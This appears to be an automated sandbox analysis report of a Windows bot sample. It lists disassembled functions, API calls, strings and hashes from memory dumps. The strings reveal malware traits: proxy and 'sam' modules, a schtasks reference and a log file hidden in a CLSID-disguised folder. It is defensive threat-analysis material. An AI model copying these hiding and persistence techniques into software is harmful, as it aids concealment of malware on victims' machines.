[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE11509ED6
(handler != NULL), xrefs: 00007FFE11509DA1
ebus_subscribe, xrefs: 00007FFE11509DA8, 00007FFE11509E22, 00007FFE11509ECF
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11509EA5
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE11509E29
H:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE11509D9A

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-3859226547
Opcode ID: ee54715b658a427df2823cff30e7a3d730bd8b0e3773518bcc4b045b142db727
Instruction ID: 3aa917dc62f6abb4a2ee6a97b24f5db7b4e4ca1f984ab85bdd1ddc9aa5f9281f
Opcode Fuzzy Hash: ee54715b658a427df2823cff30e7a3d730bd8b0e3773518bcc4b045b142db727
Instruction Fuzzy Hash: 64311262E0DD1795FB119B87E844379276AAF44B64F9884B9C84D4B7B4EE2CEC45C340

Function 00007FFE0EB4F18E Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0EB4F1A3
LeaveCriticalSection.KERNEL32 ref: 00007FFE0EB4F227
GetProcessHeap.KERNEL32 ref: 00007FFE0EB4F25E
HeapAlloc.KERNEL32 ref: 00007FFE0EB4F272

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB4F1CF
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE0EB4F2F6
mem_alloc, xrefs: 00007FFE0EB4F2BE
H:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE0EB4F1BA
ebus_subscribe, xrefs: 00007FFE0EB4F1C8, 00007FFE0EB4F242, 00007FFE0EB4F2EF
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0EB4F2C5
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE0EB4F249
(handler != NULL), xrefs: 00007FFE0EB4F1C1

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-3859226547
Opcode ID: a762dfd8b90ea0ba55ae7e7045af3371dad3685b00934e94581181074cf90e35
Instruction ID: 81237b5a8cbeaa394d6effe3b18185732daf2eb2999510cf525084fec6dbfd63
Opcode Fuzzy Hash: a762dfd8b90ea0ba55ae7e7045af3371dad3685b00934e94581181074cf90e35
Instruction Fuzzy Hash: FF314BA6F0DB0781FA70AF45E8507B52361EF40B84F48A535D9DD4B3B4EE6CA886CB41

Function 00007FFE0EBD1AAE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0EBD1AC3
LeaveCriticalSection.KERNEL32 ref: 00007FFE0EBD1B47
GetProcessHeap.KERNEL32 ref: 00007FFE0EBD1B7E
HeapAlloc.KERNEL32 ref: 00007FFE0EBD1B92

Strings

[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE0EBD1C16
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0EBD1BE5
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE0EBD1B69
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EBD1AEF
mem_alloc, xrefs: 00007FFE0EBD1BDE
(handler != NULL), xrefs: 00007FFE0EBD1AE1
H:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE0EBD1ADA
ebus_subscribe, xrefs: 00007FFE0EBD1AE8, 00007FFE0EBD1B62, 00007FFE0EBD1C0F

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-3859226547
Opcode ID: 6b97ee3234c651920c8c1a1ff33919908fcda3b5c0fddfd470832151c2fc4ccf
Instruction ID: b3003424d6305474d2983aa683bb881f79c1c819e8ad5c0a8a15d32dab49f516
Opcode Fuzzy Hash: 6b97ee3234c651920c8c1a1ff33919908fcda3b5c0fddfd470832151c2fc4ccf
Instruction Fuzzy Hash: 77312361E0EA0791FA309F59E8507F567A1AF44B84F488032C9CD5B3B8FE2DE946CB00

Function 00007FFE0EC038AE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0EC038C3
LeaveCriticalSection.KERNEL32 ref: 00007FFE0EC03947
GetProcessHeap.KERNEL32 ref: 00007FFE0EC0397E
HeapAlloc.KERNEL32 ref: 00007FFE0EC03992

Strings

ebus_subscribe, xrefs: 00007FFE0EC038E8, 00007FFE0EC03962, 00007FFE0EC03A0F
H:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE0EC038DA
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE0EC03969
(handler != NULL), xrefs: 00007FFE0EC038E1
mem_alloc, xrefs: 00007FFE0EC039DE
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE0EC03A16
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0EC039E5
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EC038EF

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-3859226547
Opcode ID: 4940b5da95d0ae020ec3bfee3c5667328d6dcc69be74491bcb0805f1be78f140
Instruction ID: d7fa3a8d52e38b02f219b28ca624418a3da589a11ae84b349f0459f3565033c9
Opcode Fuzzy Hash: 4940b5da95d0ae020ec3bfee3c5667328d6dcc69be74491bcb0805f1be78f140
Instruction Fuzzy Hash: 26313864E0DAD7B1FE158B49E8C03B92361AF46B90F588071C9CD1B3B1EE2EE8459343

Function 00007FFE0E161AAE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0E161AC3
LeaveCriticalSection.KERNEL32 ref: 00007FFE0E161B47
GetProcessHeap.KERNEL32 ref: 00007FFE0E161B7E
HeapAlloc.KERNEL32 ref: 00007FFE0E161B92

Strings

H:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE0E161ADA
mem_alloc, xrefs: 00007FFE0E161BDE
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E161BE5
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE0E161C16
ebus_subscribe, xrefs: 00007FFE0E161AE8, 00007FFE0E161B62, 00007FFE0E161C0F
(handler != NULL), xrefs: 00007FFE0E161AE1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E161AEF
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE0E161B69

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-3859226547
Opcode ID: c4a16a67b84c36c7671208724b9cc0f47182419d13bd8251ab0d063fcc4a33ae
Instruction ID: f809e5bcf29454bc53b3a8097ba045c2767ebd1db967445710e23fdffe2e75d2
Opcode Fuzzy Hash: c4a16a67b84c36c7671208724b9cc0f47182419d13bd8251ab0d063fcc4a33ae
Instruction Fuzzy Hash: 63310761F0EA17A1FA109B15E8503B523B1BF44B84F598537CCDD5B2B6EE2CA945C340

Function 00007FFE0EB4785C Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 78COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0EB47877
GetLastError.KERNEL32 ref: 00007FFE0EB478B6

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

~, xrefs: 00007FFE0EB47931
[I] (%s) -> %s, xrefs: 00007FFE0EB4789D
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu), xrefs: 00007FFE0EB478C8
proxy_init, xrefs: 00007FFE0EB47896, 00007FFE0EB478C1, 00007FFE0EB4797C
Done, xrefs: 00007FFE0EB4788F
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EB47983
P, xrefs: 00007FFE0EB47936
, xrefs: 00007FFE0EB478D4

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu)$[I] (%s) -> %s$proxy_init$~
API String ID: 3179112426-3318474754
Opcode ID: 593a7781bc7a4bf816153e54f9c9506200529e0c415f8a53ca55c7ef5cea6f3d
Instruction ID: ed68d24cb66e49d7caeb881e0ffb7285cc576de9af170e7eaab7acede10a531b
Opcode Fuzzy Hash: 593a7781bc7a4bf816153e54f9c9506200529e0c415f8a53ca55c7ef5cea6f3d
Instruction Fuzzy Hash: 3731E6B1E1C767E2FB345F55A5C03B82260EF49344E641133C6DE4A2B2DF5DA985DB02

Function 00007FFE0E165A84 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 77COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0E165A95
GetLastError.KERNEL32 ref: 00007FFE0E165AD4

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

sam_init, xrefs: 00007FFE0E165AB4, 00007FFE0E165ADF, 00007FFE0E165B9A
P, xrefs: 00007FFE0E165B54
, xrefs: 00007FFE0E165AF2
~, xrefs: 00007FFE0E165B4F
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E165BA1
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu), xrefs: 00007FFE0E165AE6
Done, xrefs: 00007FFE0E165AAD
[I] (%s) -> %s, xrefs: 00007FFE0E165ABB

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu)$[I] (%s) -> %s$sam_init$~
API String ID: 3179112426-2019511216
Opcode ID: fe9a3da2f301612be97818888d750b8a7241ff7b119f8a7d22111b0f4ab332f1
Instruction ID: c637efb9595c78f8449e50da212b71eccb3b25cf6f4bd80c1af265ce5ffb3c6c
Opcode Fuzzy Hash: fe9a3da2f301612be97818888d750b8a7241ff7b119f8a7d22111b0f4ab332f1
Instruction Fuzzy Hash: ED31E860F0C70B82FB205714A4D03B92263BF09744FA41937C5DE462F7DEAEA9859755

Function 00007FFE0EBDA060 Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 145stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE0EBDA0FA
strlen.MSVCRT ref: 00007FFE0EBDA116
strlen.MSVCRT ref: 00007FFE0EBDA127
strlen.MSVCRT ref: 00007FFE0EBDA161
strlen.MSVCRT ref: 00007FFE0EBDA17D
strcpy.MSVCRT ref: 00007FFE0EBDA199
strlen.MSVCRT ref: 00007FFE0EBDA1A1
strlen.MSVCRT ref: 00007FFE0EBDA1B0
strlen.MSVCRT ref: 00007FFE0EBDA1C5

Strings

*, xrefs: 00007FFE0EBDA1A6
schtasks, xrefs: 00007FFE0EBDA12F

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: strlen$strcpy
String ID: *$schtasks
API String ID: 2790333442-2394224502
Opcode ID: 49773f8b016588153e9639c0d4cdf904ddd36bceb3f1ef689c3b893e88a01043
Instruction ID: 39fc3c938a3d0d6631c54484298379970f1079e6dbdc789be71e3b1b02a6b22c
Opcode Fuzzy Hash: 49773f8b016588153e9639c0d4cdf904ddd36bceb3f1ef689c3b893e88a01043
Instruction Fuzzy Hash: 9251D712A4C68385F771AF25A8553F95751AF89784F580035EACE473EAFE3DD9448F00

Function 00007FFE1330660A Relevance: 16.6, APIs: 7, Strings: 4, Instructions: 104memorysleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13301C0A: recv.WS2_32 ref: 00007FFE13301C32

Sleep.KERNEL32 ref: 00007FFE13306662

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

LeaveCriticalSection.KERNEL32 ref: 00007FFE133066B5
memcpy.MSVCRT ref: 00007FFE133066D1
GetProcessHeap.KERNEL32 ref: 00007FFE133066F3
HeapAlloc.KERNEL32 ref: 00007FFE13306704
memcpy.MSVCRT ref: 00007FFE13306725
EnterCriticalSection.KERNEL32 ref: 00007FFE1330677D

Strings

[D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFE1330676A
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE13306684
routine_rx, xrefs: 00007FFE13306763
mem_alloc, xrefs: 00007FFE1330667D

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: CriticalHeapSectionmemcpy$AllocEnterLeaveProcessSleepfflushfwriterecv
String ID: [D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$routine_rx
API String ID: 3537583691-1494920791
Opcode ID: 4659351e0f4b0f1ae413d9bd91a6490a176d5636e6eab1043b102c9ff44a464a
Instruction ID: eac2e087cf567a368ca926cb5404d6844288ed62180758d3b375b6ec35229ddd
Opcode Fuzzy Hash: 4659351e0f4b0f1ae413d9bd91a6490a176d5636e6eab1043b102c9ff44a464a
Instruction Fuzzy Hash: D0418F76A08F068AEB108F12E84467E27A0FB64BB8F5444B5DD2D677A9DF3CE445D308

Function 00007FF6BFD699E2 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FF6BFD69A8E
fflush.MSVCRT ref: 00007FF6BFD69A9A
EnterCriticalSection.KERNEL32(service,0000013B444313D0,?,00007FF6BFD784F0,00007FF6BFD613B7,?,?,?,?,?,?,00007FF6BFD684AF), ref: 00007FF6BFD69AB3
LeaveCriticalSection.KERNEL32(?,00007FF6BFD784F0,00007FF6BFD613B7,?,?,?,?,?,?,00007FF6BFD684AF), ref: 00007FF6BFD69ADB
CopyFileA.KERNEL32 ref: 00007FF6BFD69B38

Strings

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log, xrefs: 00007FF6BFD69AFB
1, xrefs: 00007FF6BFD69B22
service, xrefs: 00007FF6BFD699E5
., xrefs: 00007FF6BFD69B1D

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$service
API String ID: 513531256-4171087551
Opcode ID: 63c08d7458072f3ffe3d65f4f93f73f9d412e0c73241e0ce27064e40afdb8958
Instruction ID: 25b8e55b9b5d9e1248065e0b2cae01a9f35a84ad89d6dc0e1b6db369a68b619d
Opcode Fuzzy Hash: 63c08d7458072f3ffe3d65f4f93f73f9d412e0c73241e0ce27064e40afdb8958
Instruction Fuzzy Hash: 6641AE21B0C64296F321AB9DE8513BA7391BB84784F540235EB4ECB7B5DF3CE5818780

Function 00007FFE1150CA74 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE1150CB10
_strtoui64.MSVCRT ref: 00007FFE1150CB26
_errno.MSVCRT ref: 00007FFE1150CB30
_errno.MSVCRT ref: 00007FFE1150CB3C

Strings

ini_get_uint64, xrefs: 00007FFE1150CAEF, 00007FFE1150CB5C
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1150CAE1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150CAF6
(value != NULL), xrefs: 00007FFE1150CAE8
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE1150CB63

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2069802722
Opcode ID: 6417065ff4ff75e7bd70312541eff339a187eb95395a5ef457ed19444645fb7e
Instruction ID: bbeb1ae5b25c03b7d4cb05b64fc81fe3dfa10e0039bb7f36c3073a828e8c91ca
Opcode Fuzzy Hash: 6417065ff4ff75e7bd70312541eff339a187eb95395a5ef457ed19444645fb7e
Instruction Fuzzy Hash: A421CC22A08F4686E7218F96FC407AA3369BB497A4F4840B6EE4C47770DF7CD885C700

Function 00007FFE133094F4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE13309590
_strtoui64.MSVCRT ref: 00007FFE133095A6
_errno.MSVCRT ref: 00007FFE133095B0
_errno.MSVCRT ref: 00007FFE133095BC

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13309576
ini_get_uint64, xrefs: 00007FFE1330956F, 00007FFE133095DC
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE13309561
(value != NULL), xrefs: 00007FFE13309568
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE133095E3

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2069802722
Opcode ID: 3f6a0b15f8ca91d918480fae1623ca515a98658efb4e61b5bea6a53a6314fc42
